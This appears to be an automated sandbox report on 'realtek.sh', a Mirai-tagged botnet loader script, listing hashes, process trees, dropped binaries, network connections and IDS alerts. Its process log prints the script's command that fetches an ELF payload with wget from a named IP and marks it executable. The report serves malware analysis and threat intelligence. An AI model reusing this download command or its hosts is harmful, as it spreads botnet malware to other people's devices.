File name:

realtek.sh

Full analysis: https://app.any.run/tasks/ba2be516-c538-4fa4-bc66-2b8401bc6786
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: June 18, 2025, 12:03:36
OS: Ubuntu 22.04.2
Tags:
auto
generic
mirai
botnet
MIME: text/plain
File info: ASCII text
MD5:

328D00329E19D164140E81251E29024C

SHA1:

B5D957153F9F5FF33D70DAA58BCB50D7C8503576

SHA256:

AB2FDC150B5FCDAFEF70DEE90D6B4C405F5FC25D6B19D77CACBC0F1C0A265AFE

SSDEEP:

48:o4S80SoDazuAmIBGeKktXPS9SoskAXCeVvH2S4xtAWBhAfZorSovVAu1earL:o4S87mazuHIBGbktXPSERkKCqvHp4xtD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GENERIC has been found (auto)

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41421)
      • wget (PID: 41431)
      • busybox (PID: 41452)
      • wget (PID: 41438)
      • busybox (PID: 41475)
      • busybox (PID: 41487)
      • busybox (PID: 41494)
      • busybox (PID: 41504)
      • busybox (PID: 41509)
      • busybox (PID: 41518)
    • MIRAI has been found (auto)

      • wget (PID: 41426)
      • busybox (PID: 41499)
    • Application was dropped or rewritten from another process

      • tt27 (deleted) (PID: 41442)
      • tt27 (deleted) (PID: 41445)
      • xle1 (PID: 41440)
      • tt27 (deleted) (PID: 41444)
      • tt27 (deleted) (PID: 41447)
      • tt27 (deleted) (PID: 41441)
      • tt27 (deleted) (PID: 41482)
      • tt27 (deleted) (PID: 41480)
      • tt27 (deleted) (PID: 41481)
      • tt27 (deleted) (PID: 41488)
      • tt27 (deleted) (PID: 41489)
      • xle1 (PID: 41511)
      • 8lg4 (deleted) (PID: 41516)
      • 8lg4 (deleted) (PID: 41515)
      • 8lg4 (deleted) (PID: 41517)
      • 8lg4 (deleted) (PID: 41512)
      • 8lg4 (deleted) (PID: 41514)
      • xale1 (PID: 41520)
  • SUSPICIOUS

    • Starts itself from another location

      • xle1 (PID: 41440)
      • xle1 (PID: 41511)
      • xale1 (PID: 41520)
    • Modifies file or directory owner

      • sudo (PID: 41398)
    • Executes commands using command-line interpreter

      • sudo (PID: 41401)
      • bash (PID: 41402)
    • Uses wget to download content

      • bash (PID: 41402)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 41402)
    • Connects to the server without a host name

      • wget (PID: 41411)
      • wget (PID: 41404)
      • wget (PID: 41421)
      • wget (PID: 41416)
      • wget (PID: 41426)
      • wget (PID: 41431)
      • wget (PID: 41446)
      • busybox (PID: 41452)
      • wget (PID: 41438)
      • busybox (PID: 41487)
      • busybox (PID: 41475)
      • busybox (PID: 41494)
      • busybox (PID: 41499)
      • busybox (PID: 41504)
      • busybox (PID: 41518)
      • busybox (PID: 41509)
    • Potential Corporate Privacy Violation

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41426)
      • wget (PID: 41416)
      • wget (PID: 41421)
      • wget (PID: 41438)
      • busybox (PID: 41452)
      • wget (PID: 41431)
      • busybox (PID: 41475)
      • busybox (PID: 41487)
      • busybox (PID: 41499)
      • busybox (PID: 41494)
      • busybox (PID: 41504)
      • busybox (PID: 41509)
      • busybox (PID: 41518)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • xale1 (PID: 41520)
  • INFO

    • Checks timezone

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41421)
      • wget (PID: 41426)
      • wget (PID: 41431)
      • wget (PID: 41438)
      • wget (PID: 41446)
    • Creates file in the temporary folder

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41438)
      • wget (PID: 41421)
      • wget (PID: 41426)
      • wget (PID: 41431)
      • busybox (PID: 41452)
      • busybox (PID: 41475)
      • busybox (PID: 41494)
      • busybox (PID: 41487)
      • busybox (PID: 41499)
      • busybox (PID: 41504)
      • busybox (PID: 41509)
      • busybox (PID: 41518)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
273
Monitored processes
143
Malicious processes
18
Suspicious processes
5

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
41397/bin/sh -c "sudo chown user /home/user/Desktop/realtek\.sh && chmod +x /home/user/Desktop/realtek\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/realtek\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41398sudo chown user /home/user/Desktop/realtek.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41399chown user /home/user/Desktop/realtek.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41400chmod +x /home/user/Desktop/realtek.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41401sudo -iu user /home/user/Desktop/realtek.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41402-bash --login -c \/home\/user\/Desktop\/realtek\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41403/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41404wget http://31.57.63.48/j/mle1/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41407chmod 777 mle1/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41408-bash --login -c \/home\/user\/Desktop\/realtek\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
10
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
41404wget/tmp/mle1binary
MD5:
SHA256:
41411wget/tmp/mbe1binary
MD5:
SHA256:
41416wget/tmp/aale1o
MD5:
SHA256:
41421wget/tmp/a5le1o
MD5:
SHA256:
41426wget/tmp/a7le1 (deleted)o
MD5:
SHA256:
41431wget/tmp/ppc1o
MD5:
SHA256:
41438wget/tmp/xle1binary
MD5:
SHA256:
41452busybox/tmp/mle1o
MD5:
SHA256:
41475busybox/tmp/mbe1 (deleted)binary
MD5:
SHA256:
41487busybox/tmp/aale1binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
28
TCP/UDP connections
26
DNS requests
18
Threats
16

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
POST
200
185.125.188.54:443
https://api.snapcraft.io/v2/snaps/refresh
GB
binary
45.5 Kb
whitelisted
POST
200
185.125.188.54:443
https://api.snapcraft.io/api/v1/snaps/auth/nonces
GB
binary
54 b
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
GB
binary
45.4 Kb
whitelisted
POST
200
185.125.188.57:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
GB
whitelisted
POST
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
GB
binary
45.4 Kb
whitelisted
GET
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/info/curl?architecture=amd64&fields=architectures%2Cbase%2Cconfinement%2Clinks%2Ccontact%2Ccreated-at%2Cdescription%2Cdownload%2Cepoch%2Clicense%2Cname%2Cprices%2Cprivate%2Cpublisher%2Crevision%2Csnap-id%2Csummary%2Ctitle%2Ctype%2Cversion%2Cwebsite%2Cstore-url%2Cmedia%2Ccommon-ids%2Ccategories
GB
binary
3.07 Kb
whitelisted
GET
204
185.125.190.49:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
GET
185.125.190.49:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
GET
185.125.190.97:80
http://connectivity-check.ubuntu.com/
GB
whitelisted
41404
wget
GET
200
31.57.63.48:80
http://31.57.63.48/j/mle1
IR
binary
76.6 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
185.125.190.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
195.181.175.41:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.57:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41404
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown
41411
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown
41416
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown
41421
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::196
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2001:67c:1562::24
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 185.125.190.49
  • 91.189.91.96
  • 185.125.190.97
  • 91.189.91.98
  • 91.189.91.48
  • 185.125.190.48
  • 91.189.91.97
  • 185.125.190.98
  • 185.125.190.96
  • 91.189.91.49
  • 185.125.190.17
  • 185.125.190.18
whitelisted
odrs.gnome.org
  • 195.181.175.41
  • 169.150.255.181
  • 207.211.211.27
  • 212.102.56.178
  • 195.181.170.18
  • 169.150.255.183
  • 37.19.194.81
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::107
whitelisted
api.snapcraft.io
  • 185.125.188.57
  • 185.125.188.54
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
whitelisted
google.com
  • 142.250.185.110
  • 2a00:1450:4001:80f::200e
whitelisted
12.100.168.192.in-addr.arpa
unknown
twinkfinder.nl
unknown
cross-compiling.org
unknown
i-kiss-boys.com
unknown
furry-femboys.top
unknown
3gipcam.com
unknown

Threats

PID
Process
Class
Message
41404
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41411
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41416
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41421
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41426
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41431
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41438
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41452
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41475
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41487
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info